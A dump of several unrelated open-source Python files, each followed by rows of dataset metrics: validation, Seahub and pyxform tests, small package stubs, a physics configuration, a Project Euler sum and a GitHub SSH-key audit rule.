report = validate({"tasks": [{"source": "data/table.csv"}]})
assert report.valid
def test_validate_inquiry_multiple():
report = validate(
{"tasks": [{"source": "data/table.csv"}, {"source": "data/matrix.csv"}]},
)
assert report.valid
def test_validate_inquiry_multiple_invalid():
report = validate(
{"tasks": [{"source": "data/table.csv"}, {"source": "data/invalid.csv"}]},
)
assert report.flatten(["taskPosition", "rowPosition", "fieldPosition", "code"]) == [
[2, None, 3, "blank-label"],
[2, None, 4, "duplicate-label"],
[2, 2, 3, "missing-cell"],
[2, 2, 4, "missing-cell"],
[2, 3, 3, "missing-cell"],
[2, 3, 4, "missing-cell"],
[2, 4, None, "blank-row"],
[2, 5, 5, "extra-cell"],
]
def test_validate_inquiry_multiple_invalid_limit_errors():
report = validate(
{
"tasks": [
{"source": "data/table.csv"},
{"source": "data/invalid.csv", "limitErrors": 1},
]
},
)
assert report.flatten(["taskPosition", "code", "note"]) == [
[2, "blank-label", ""],
]
assert report.tasks[0].flatten(["rowPosition", "fieldPosition", "code"]) == []
assert report.tasks[1].flatten(["rowPosition", "fieldPosition", "code"]) == [
[None, 3, "blank-label"],
]
def test_validate_inquiry_multiple_invalid_with_schema():
report = validate(
{
"tasks": [
{
"source": "data/table.csv",
"schema": {"fields": [{"name": "bad"}, {"name": "name"}]},
},
{"source": "data/invalid.csv"},
],
},
)
assert report.flatten(["taskPosition", "rowPosition", "fieldPosition", "code"]) == [
[1, None, 1, "incorrect-label"],
[2, None, 3, "blank-label"],
[2, None, 4, "duplicate-label"],
[2, 2, 3, "missing-cell"],
[2, 2, 4, "missing-cell"],
[2, 3, 3, "missing-cell"],
[2, 3, 4, "missing-cell"],
[2, 4, None, "blank-row"],
[2, 5, 5, "extra-cell"],
]
@pytest.mark.skip
def test_validate_inquiry_with_one_package():
report = validate(
{"tasks": [{"source": "data/package/datapackage.json"}]},
)
assert report.valid
@pytest.mark.skip
def test_validate_inquiry_with_multiple_packages():
report = validate(
{
"tasks": [
{"source": "data/package/datapackage.json"},
{"source": "data/invalid/datapackage.json"},
]
},
)
assert report.flatten(["taskPosition", "rowPosition", "fieldPosition", "code"]) == [
[3, 3, None, "blank-row"],
[3, 3, None, "primary-key-error"],
[4, 4, None, "blank-row"],
]
# Parallel
@pytest.mark.skip
@pytest.mark.ci
def test_validate_inquiry_parallel_multiple():
report = validate(
{"tasks": [{"source": "data/table.csv"}, {"source": "data/matrix.csv"}]},
parallel=True,
)
assert report.valid
@pytest.mark.skip
@pytest.mark.ci
def test_validate_inquiry_parallel_multiple_invalid():
report = validate(
{"tasks": [{"source": "data/table.csv"}, {"source": "data/invalid.csv"}]},
parallel=True,
)
assert report.flatten(["taskPosition", "rowPosition", "fieldPosition", "code"]) == [
[2, None, 3, "blank-label"],
[2, None, 4, "duplicate-label"],
[2, 2, 3, "missing-cell"],
[2, 2, 4, "missing-cell"],
[2, 3, 3, "missing-cell"],
[2, 3, 4, "missing-cell"],
[2, 4, None, "blank-row"],
[2, 5, 5, "extra-cell"],
]
@pytest.mark.skip
def test_validate_inquiry_with_multiple_packages_with_parallel():
report = validate(
{
"tasks": [
{"source": "data/package/datapackage.json"},
{"source": "data/invalid/datapackage.json"},
]
},
parallel=True,
)
assert report.flatten(["taskPosition", "rowPosition", "fieldPosition", "code"]) == [
[3, 3, None, "blank-row"],
[3, 3, None, "primary-key-error"],
[4, 4, None, "blank-row"],
]
| 28.335526 | 88 | 0.527513 | 450 | 4,307 | 4.944444 | 0.137778 | 0.080899 | 0.064719 | 0.098876 | 0.841798 | 0.836404 | 0.787865 | 0.755955 | 0.733034 | 0.685843 | 0 | 0.026358 | 0.277687 | 4,307 | 151 | 89 | 28.523179 | 0.688846 | 0.003715 | 0 | 0.56 | 0 | 0 | 0.278685 | 0.033815 | 0 | 0 | 0 | 0 | 0.096 | 1 | 0.08 | false | 0 | 0.016 | 0 | 0.096 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55f85be4847f718e720be65fc291a588c63e9f6c | 118 | py | Python | legacy/dx/simulator/simulator_diagnoser/io/__init__.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | 2 | 2020-04-09T13:04:25.000Z | 2021-09-24T14:17:26.000Z | legacy/dx/simulator/simulator_diagnoser/io/__init__.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | null | null | null | legacy/dx/simulator/simulator_diagnoser/io/__init__.py | GaloisInc/adapt | 2ccff778d3e77505899266572f8f7caacb5b630f | [
"BSD-3-Clause"
] | 3 | 2019-09-20T20:49:54.000Z | 2021-09-02T17:33:47.000Z | from .messenger import Messenger
from .kafka_messenger import *
from .kafka_logging import *
from .db_client import *
| 23.6 | 32 | 0.805085 | 16 | 118 | 5.75 | 0.4375 | 0.326087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135593 | 118 | 4 | 33 | 29.5 | 0.901961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
36d157f07d936a8f503e8726b17525c4d6f036b0 | 254 | py | Python | money/views/shared/access.py | taqueci/nomoney | 940879ffff0d17724709e642d9c1911ac4e996ce | [
"MIT"
] | null | null | null | money/views/shared/access.py | taqueci/nomoney | 940879ffff0d17724709e642d9c1911ac4e996ce | [
"MIT"
] | 2 | 2020-06-06T13:08:38.000Z | 2022-02-10T14:51:16.000Z | money/views/shared/access.py | taqueci/nomoney | 940879ffff0d17724709e642d9c1911ac4e996ce | [
"MIT"
] | null | null | null | # Copyright (C) Takeshi Nakamura. All rights reserved.
def creatable(user):
return user.is_staff
def readable(user):
return not user.is_anonymous
def updatable(user):
return user.is_staff
def deletable(user):
return user.is_staff
| 14.111111 | 54 | 0.724409 | 36 | 254 | 5 | 0.5 | 0.222222 | 0.233333 | 0.266667 | 0.383333 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192913 | 254 | 17 | 55 | 14.941176 | 0.878049 | 0.204724 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
36dcb228316c97ee875068963ae43cecea7f794d | 168 | py | Python | stack_controller/src/controller/controller.py | Shravista/StackBot | 24593de136207faeed10475ee3233a23a314722c | [
"MIT"
] | null | null | null | stack_controller/src/controller/controller.py | Shravista/StackBot | 24593de136207faeed10475ee3233a23a314722c | [
"MIT"
] | null | null | null | stack_controller/src/controller/controller.py | Shravista/StackBot | 24593de136207faeed10475ee3233a23a314722c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import rospy
class Controller:
def __init__(self):
pass
def execute(self):
pass
def shutdown(self):
pass
| 12 | 23 | 0.583333 | 20 | 168 | 4.7 | 0.7 | 0.255319 | 0.234043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0.327381 | 168 | 13 | 24 | 12.923077 | 0.823009 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.375 | 0.125 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
36fc4b9324eb3bdd3da1c63f86b0bb2d6148065e | 27 | py | Python | _notebooks/IllustratingThePoint_4/utils/__init__.py | millerdw/millerdw | 0eb8fe1ee19680aa6f5f06ad8fc06d7038335d77 | [
"MIT"
] | 3 | 2019-03-25T23:41:40.000Z | 2019-04-03T13:47:30.000Z | _notebooks/IllustratingThePoint_4/utils/__init__.py | millerdw/millerdw | 0eb8fe1ee19680aa6f5f06ad8fc06d7038335d77 | [
"MIT"
] | null | null | null | _notebooks/IllustratingThePoint_4/utils/__init__.py | millerdw/millerdw | 0eb8fe1ee19680aa6f5f06ad8fc06d7038335d77 | [
"MIT"
] | null | null | null |
from .ProgressBar import * | 13.5 | 26 | 0.777778 | 3 | 27 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 2 | 26 | 13.5 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7fe194e6bfc2848512256a5b389b4e813beaf62a | 27 | py | Python | whyqd/method/__init__.py | whythawk/whyqd | 8ee41768d6788318458d41831200594b61777ccc | [
"BSD-3-Clause"
] | 17 | 2020-02-21T14:41:24.000Z | 2022-01-31T20:25:53.000Z | whyqd/method/__init__.py | whythawk/whyqd | 8ee41768d6788318458d41831200594b61777ccc | [
"BSD-3-Clause"
] | null | null | null | whyqd/method/__init__.py | whythawk/whyqd | 8ee41768d6788318458d41831200594b61777ccc | [
"BSD-3-Clause"
] | null | null | null | from .method import Method
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3d00c88be3d450a27450a4ca32d73ca0d44cffcb | 5,340 | py | Python | 013.py | alphaJohnny/Euler-Solutions | d671d789145bb1a58a5c4ba3252501f6a7a7b147 | [
"MIT"
] | null | null | null | 013.py | alphaJohnny/Euler-Solutions | d671d789145bb1a58a5c4ba3252501f6a7a7b147 | [
"MIT"
] | null | null | null | 013.py | alphaJohnny/Euler-Solutions | d671d789145bb1a58a5c4ba3252501f6a7a7b147 | [
"MIT"
] | null | null | null | import numpy as np
import math
_nums100 = """37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690"""
nums100 = _nums100.splitlines()
nums100 = [int(v) for v in nums100]
if __name__ == '__main__':
l100 = np.array(nums100)
s100 = sum(l100)
print(str(s100)[0:10])
print(s100) | 46.842105 | 64 | 0.964981 | 134 | 5,340 | 38.380597 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.970328 | 0.02809 | 5,340 | 114 | 65 | 46.842105 | 0.020617 | 0 | 0 | 0 | 0 | 0 | 0.956188 | 0.936154 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018349 | 0 | 0.018349 | 0.018349 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3d508ed71deed9e515469e865aecd007c7c2caa0 | 392 | py | Python | Configuration/Eras/python/Era_Phase2_timing_layer_new_cff.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | Configuration/Eras/python/Era_Phase2_timing_layer_new_cff.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | Configuration/Eras/python/Era_Phase2_timing_layer_new_cff.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2_timing_cff import Phase2_timing
from Configuration.Eras.Modifier_phase2_timing_layer_cff import phase2_timing_layer
from Configuration.Eras.Modifier_phase2_timing_layer_new_cff import phase2_timing_layer_new
Phase2_timing_layer_new = cms.ModifierChain(Phase2_timing, phase2_timing_layer, phase2_timing_layer_new)
| 43.555556 | 104 | 0.903061 | 57 | 392 | 5.736842 | 0.298246 | 0.366972 | 0.363914 | 0.244648 | 0.440367 | 0.281346 | 0.281346 | 0 | 0 | 0 | 0 | 0.027174 | 0.061224 | 392 | 8 | 105 | 49 | 0.861413 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1812fb11e4f371c948ce9f40714ef2ab735e5e93 | 160 | py | Python | github_rules/github_user_access_key_created.py | panther-labs/panther-cli | 4e5c0a21570e1a02dada990fd91e324416afac96 | [
"MIT"
] | 4 | 2019-10-17T19:33:29.000Z | 2019-10-21T15:23:30.000Z | github_rules/github_user_access_key_created.py | jacknagz/panther-analysis | fceab78ba5624136776596ee1b25fa0dc8a02a42 | [
"Apache-2.0"
] | null | null | null | github_rules/github_user_access_key_created.py | jacknagz/panther-analysis | fceab78ba5624136776596ee1b25fa0dc8a02a42 | [
"Apache-2.0"
] | null | null | null | def rule(event):
return event.get("action") == "public_key.create"
def title(event):
return f"User [{event.udm('actor_user')}] created a new ssh key"
| 22.857143 | 68 | 0.66875 | 25 | 160 | 4.2 | 0.72 | 0.209524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 160 | 6 | 69 | 26.666667 | 0.783582 | 0 | 0 | 0 | 0 | 0 | 0.48125 | 0.16875 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
18254a562623f819f5f433d8a1e99d900d9f8746 | 3,624 | py | Python | tests/api/endpoints/admin/test_revision_tag.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | [
"Apache-2.0"
] | 420 | 2015-01-03T11:34:46.000Z | 2022-03-10T07:15:41.000Z | tests/api/endpoints/admin/test_revision_tag.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | [
"Apache-2.0"
] | 735 | 2015-01-04T21:22:51.000Z | 2022-03-31T09:26:07.000Z | tests/api/endpoints/admin/test_revision_tag.py | weimens/seahub | 5ecf78ed7a2ddc72a23961804ee41be21c24893f | [
"Apache-2.0"
] | 379 | 2015-01-05T17:08:03.000Z | 2022-03-06T00:11:50.000Z | import os
import json
from mock import patch
from django.urls import reverse
from seahub.test_utils import BaseTestCase
from seaserv import seafile_api
class RevisionTagsTest(BaseTestCase):
def setUp(self):
self.login_as(self.admin)
self.url = reverse("api-v2.1-admin-revision-tags-tagged-items")
self.url_create = reverse("api-v2.1-revision-tags-tagged-items")
self.repo = seafile_api.get_repo(self.create_repo(
name="test_repo",
desc="",
username=self.admin.username,
passwd=None
))
self.tag_name = "test_tag_name"
def test_get_revision_by_user(self):
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ''
})
assert resp.status_code in [200, 201]
resp = self.client.get(self.url+"?user="+self.admin.username)
assert self.tag_name in [e["tag"] for e in resp.data]
resp = self.client.get(self.url+"?user="+self.user.username)
assert not self.tag_name in [e["tag"] for e in resp.data]
def test_get_revision_by_repo_id(self):
p_repo = seafile_api.get_repo(self.create_repo(
name="test_repo",
desc="",
username=self.admin.username,
passwd=None
))
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ""
})
assert resp.status_code in [200, 201]
resp = self.client.get(self.url+"?repo_id="+self.repo.id)
assert self.tag_name in [e["tag"] for e in resp.data]
resp = self.client.get(self.url+"?repo_id="+p_repo.id)
assert not self.tag_name in [e["tag"] for e in resp.data]
def test_revisin_by_tag_name(self):
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ""
})
assert resp.status_code in [200, 201]
resp = self.client.get(self.url+"?tag_name="+self.tag_name)
assert self.tag_name in [e["tag"] for e in resp.data]
resp = self.client.get(self.url+"?tag_name=Hello")
assert not self.tag_name in [e["tag"] for e in resp.data]
def test_revisin_by_tag_contains(self):
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ""
})
assert resp.status_code in [200, 201]
resp = self.client.get(self.url+"?tag_contains="+self.tag_name[:-2])
assert self.tag_name in [e["tag"] for e in resp.data]
resp = self.client.get(self.url+"?tag_contains=Hello")
assert not self.tag_name in [e["tag"] for e in resp.data]
def test_revision_all(self):
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ""
})
assert resp.status_code in [200, 201]
resp = self.client.get(self.url)
assert self.tag_name in [e["tag"] for e in resp.data]
def test_get_all_tag_when_repo_deleted(self):
resp = self.client.post(self.url_create, {
"tag_names": self.tag_name,
"repo_id": self.repo.id,
"commit_id": ""
})
assert resp.status_code in [200, 201]
seafile_api.remove_repo(self.repo.id)
resp = self.client.get(self.url)
assert resp.status_code in [200, 201]
| 36.979592 | 76 | 0.594371 | 521 | 3,624 | 3.946257 | 0.128599 | 0.074903 | 0.096304 | 0.082685 | 0.802529 | 0.756809 | 0.756809 | 0.731518 | 0.706226 | 0.706226 | 0 | 0.017884 | 0.274834 | 3,624 | 97 | 77 | 37.360825 | 0.76446 | 0 | 0 | 0.655172 | 0 | 0 | 0.102649 | 0.020971 | 0 | 0 | 0 | 0 | 0.183908 | 1 | 0.08046 | false | 0.022989 | 0.068966 | 0 | 0.16092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1833a10b000d5c52235223f83964608491036644 | 6,983 | py | Python | pyxform/tests/xlsform_spec_test.py | gushil/pyxform | d2463fcda5ca9d430c7cdfdb63461f54025fae11 | [
"BSD-2-Clause"
] | 1 | 2020-10-19T15:37:36.000Z | 2020-10-19T15:37:36.000Z | pyxform/tests/xlsform_spec_test.py | nribeka/pyxform | bee96541d39519b7e6f3dab3422874ed48ddf7ae | [
"BSD-2-Clause"
] | 1 | 2022-03-16T13:48:25.000Z | 2022-03-17T07:33:15.000Z | pyxform/tests/xlsform_spec_test.py | nribeka/pyxform | bee96541d39519b7e6f3dab3422874ed48ddf7ae | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Some tests for the new (v0.9) spec is properly implemented.
"""
import codecs
import os
import unittest2 as unittest
import pyxform
from pyxform.errors import PyXFormError
from pyxform.tests.utils import XFormTestCase
DIR = os.path.dirname(__file__)
class MainTest(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "xlsform_spec_test.xlsx"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
# Do the conversion:
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, default_name="xlsform_spec_test", warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
# print warnings
# Compare with the expected output:
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
class FlatXlsformTest(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "flat_xlsform_test.xlsx"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
# Do the conversion:
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, default_name="flat_xlsform_test", warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
# print warnings
# Compare with the expected output:
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
class TestNewWidgets(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "widgets.xls"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
# Do the conversion:
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, default_name="widgets", warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
# print warnings
# Compare with the expected output:
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
class WarningsTest(unittest.TestCase):
"""
Just checks that the number of warnings thrown when reading warnings.xls
doesn't change
"""
def runTest(self):
filename = "warnings.xls"
path_to_excel_file = os.path.join(DIR, "example_xls", filename)
warnings = []
pyxform.xls2json.parse_file_to_json(
path_to_excel_file, default_name="warnings", warnings=warnings
)
self.assertEquals(
len(warnings), 22, "Found " + str(len(warnings)) + " warnings"
)
class CalculateWithoutCalculationTest(unittest.TestCase):
"""
Just checks that calculate field without calculation raises a PyXFormError.
"""
def runTest(self):
filename = "calculate_without_calculation.xls"
path_to_excel_file = os.path.join(DIR, "example_xls", filename)
self.assertRaises(
PyXFormError, pyxform.xls2json.parse_file_to_json, path_to_excel_file
)
class PullDataTest(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "pull_data.xlsx"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
# Do the conversion:
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, default_name="pull_data", warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
# Compare with the expected output:
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
# cleanup
os.remove(self.output_path)
class SeachAndSelectTest(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "search_and_select.xlsx"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
# Do the conversion:
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, default_name="search_and_select", warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
# Compare with the expected output:
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
# cleanup
os.remove(self.output_path)
class DefaultSurveySheetTest(XFormTestCase):
maxDiff = None
def runTest(self):
filename = "survey_no_name.xlsx"
self.get_file_path(filename)
expected_output_path = os.path.join(
DIR, "test_expected_output", self.root_filename + ".xml"
)
warnings = []
json_survey = pyxform.xls2json.parse_file_to_json(
self.path_to_excel_file, warnings=warnings
)
survey = pyxform.create_survey_element_from_dict(json_survey)
survey.print_xform_to_file(self.output_path, warnings=warnings)
with codecs.open(expected_output_path, "rb", encoding="utf-8") as expected_file:
with codecs.open(self.output_path, "rb", encoding="utf-8") as actual_file:
self.assertXFormEqual(expected_file.read(), actual_file.read())
if __name__ == "__main__":
unittest.main()
